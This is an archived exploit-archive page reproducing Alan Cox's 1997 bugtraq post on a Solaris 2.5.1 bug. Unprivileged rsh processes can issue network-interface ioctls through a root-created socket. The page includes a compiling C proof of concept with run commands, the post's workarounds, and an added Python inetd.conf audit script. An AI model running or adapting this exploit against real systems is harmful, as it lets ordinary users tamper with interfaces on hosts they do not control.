Solaris root socket descriptor bug

Description: You can swipe control of a root-owned socket descriptor from user-owned inetd processes like rshd.
Author: Alan Cox (alan@LXORGUK.UKUU.ORG.UK)
Compromise: control of a root-owned socket
Vulnerable Systems: Solaris 2.5.1, probably earlier versions. I hear that 2.6 is fixed. Sun doesn't seem interested in fixing this, for some reason.
Date: 19 June 1997 was the date of this post, although Alan has been complaining about the bug for ages.
Notes: You may have to change your interface to le0, hme0, or whatever to make it work.

Solaris 2.5.1 party piece

Thu, 19 Jun 1997 15:27:39 +0100 


Well CERT have had this for a year, AUSCERT for a couple of weeks and
now it's time bugtraq had it

cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
{
        struct ifreq please_break_me;

        /* Name the interface to poke; swap in le0, hme0, etc. as needed. */
        strcpy(please_break_me.ifr_name, "lo0");

        /* fd 0 is the connection socket that inetd created as root and rshd
         * handed to this unprivileged process.  ifr_flags is left
         * uninitialised, exactly as in the original post. */
        if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
                perror("Damn it didnt work. Obviously not Solaris ;)");
        return 0;
}

You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.

 1.  Disable rsh and any non-root-owned inetd tasks - breaks remote tar etc.
 2.  Run an OS that the vendor doesn't take a year to fix bugs in

I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
to prove Sun have sat on this for ages.
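Alan's first workaround is to disable rsh and any inetd service that does not stay root, since on an unpatched box those processes inherit a root-created socket on fd 0 and can issue interface ioctls through it. The script below is an added example, not part of the original post or of any Sun tool: it parses an inetd.conf in the classic seven-column layout (service, socket type, protocol, wait/nowait, user[.group], program, args) and lists the entries an administrator would need to disable or review. The sample configuration embedded in it is constructed for the example; the set of rsh server names is an assumption covering the common Solaris spelling.

```python
"""Audit an inetd.conf for services that would need disabling under Alan's
first workaround: anything that runs as, or switches to, a non-root user
while still holding the root-created connection socket on fd 0."""

# Constructed sample inetd.conf (not from any real host).
SAMPLE_INETD_CONF = """\
# Sample inetd.conf (constructed for this example)
ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd      in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/in.telnetd   in.telnetd
shell   stream  tcp     nowait  root    /usr/sbin/in.rshd      in.rshd
finger  stream  tcp     nowait  nobody  /usr/sbin/in.fingerd   in.fingerd
# disabled:
#uucp   stream  tcp     nowait  root    /usr/sbin/in.uucpd     in.uucpd
100083/1 tli    rpc/tcp wait    root    /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
"""

# Assumed names of the rsh server binary; rshd authenticates as root and then
# setuid()s to the remote user with the socket still on fds 0/1/2.
RSH_PROGRAMS = {"in.rshd", "rshd"}


def parse_inetd_conf(text):
    """Return one dict per active (non-comment) entry, keyed by column name."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # too short to be a runnable entry; inetd would skip it
        user, _, group = fields[4].partition(".")  # Solaris allows user.group
        entries.append({
            "line": lineno,
            "service": fields[0],
            "socket_type": fields[1],
            "protocol": fields[2],
            "wait": fields[3],
            "user": user,
            "group": group or None,
            "program": fields[5],
            "args": fields[6:],
        })
    return entries


def audit(entries):
    """Return (line, service, reason) for entries that hold a root-created
    socket while running with a non-root uid."""
    findings = []
    for e in entries:
        prog = e["program"].rsplit("/", 1)[-1]
        if e["user"] != "root":
            findings.append((e["line"], e["service"],
                             "inetd starts it as %s, not root" % e["user"]))
        elif prog in RSH_PROGRAMS or e["service"] == "shell":
            findings.append((e["line"], e["service"],
                             "rsh server: becomes the remote user after auth"))
    return findings


def audit_text(text):
    """Convenience wrapper: parse and audit a whole inetd.conf in one call."""
    return audit(parse_inetd_conf(text))


if __name__ == "__main__":
    for line, service, reason in audit_text(SAMPLE_INETD_CONF):
        print("line %d: %-10s %s" % (line, service, reason))
```

Run it against a real /etc/inetd.conf by reading the file into `audit_text`; every entry it reports is one that, on an unpatched 2.5.1 host, ends up with an unprivileged process holding a socket the kernel treats as root's. Entries that stay root for their whole life are not listed, which is why ftp and the rpc service above pass.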


This page is part of Fyodor's exploit world.